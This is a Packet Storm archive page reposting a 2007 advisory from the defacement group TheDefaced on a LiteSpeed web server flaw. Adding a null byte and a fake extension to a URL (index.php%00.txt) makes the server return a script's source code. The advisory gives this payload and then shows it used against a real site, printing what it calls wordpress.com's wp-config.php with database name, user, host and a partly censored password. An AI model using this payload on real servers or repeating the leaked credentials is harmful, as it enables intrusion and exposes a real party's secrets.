exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

litespeed-disclose.txt

litespeed-disclose.txt
Posted Oct 22, 2007
Authored by Tr3mbl3r | Site thedefaced.org

LiteSpeed web server versions 3.2.3 and below suffers from a remote source code disclosure vulnerability.

tags | exploit, remote, web, info disclosure
SHA-256 | 10f706a81bb0241c74ca93f5df3344a25ac69a97da71e3836c744c71264ece91

litespeed-disclose.txt

Change Mirror Download
########################################################################################
########### _______ __ _____ ___ __ ###########
########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ###########
########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ###########
########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ###########
########### ###########
########### TheDefaced.org ###########
########### TheDefaced Security Team Presents An 0-day. ###########
########### LiteSpeed Remote Mime Type Injection ###########
########### Discovered by:Tr3mbl3r ###########
########### Shouts to his kitty kats and tacos. ###########
########################################################################################
# Product: #
# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. #
# #
# Vuln: #
# Remote Mime Type Injection #
# #
# Description: #
# Litespeed will parse an URL/Files mimetype incorrectly. #
# When given a nullbyte. #
# #
# Patch: #
# Upgrade to LiteSpeed 3.2.4 has just been released today. #
# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 #
# #
# This vuln was found before an update was released they fixed it after they found it..#
# In their logs. #
# #
# Risk: Extremely High #
########################################################################################
# Example: #
# Basicly if you had a URL like so http://www.site.com/index.php. #
# And you wanted this websites source you could simply add a nullbyte and an extension #
# Like So http://www.site.com/index.php%00.txt #
# Litespeed would then at this point asume the file is a txt file. #
# #
# Keep in mind that this vuln is Mime Type Injection... so it works with any type. #
# Like if you did %00.rar it would asume the index.php was a rar file. #
# Theres a numerous ammount of things you could do. #
# #
# As to of why litespeed does this is not confirmed by us just yet. #
# #
# I asume it has somthing to do with mimetype handling thus the name of the exploit. #
# MimeType Injection. #
########################################################################################
# An Example of This Vuln being put in to use. #
# #
# The Following is WordPress.com's Wp-Config.php #
# http://wordpress.com/wp-config.php%00.txt #
########################################################################################
# ###########
# <?php #
# #
# // This is probably useless? #
# define('DB_NAME', 'wpmu'); // The name of the database #
# define('DB_USER', 'wpmu'); // Your MySQL username #
# define('DB_PASSWORD', 'JTO5T**CENSOR-HERE**'); // ...and password #
# define('DB_HOST', 'two.wordpress.com'); // 99% chance you won't need to change this value #
# #
# require('define.php'); #
# #
# require(ABSPATH . 'wpmu-settings.php'); #
# #
# ?> #
# #
##################################################################################################
# Contact Us #
##################################################################################################
# WebSite: http://www.thedefaced.org #
# Forums for more info: http://www.thedefaced.org/forums/ #
# IRC: irc.thedefaced.org/#TheDefaced #
##################################################################################################

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close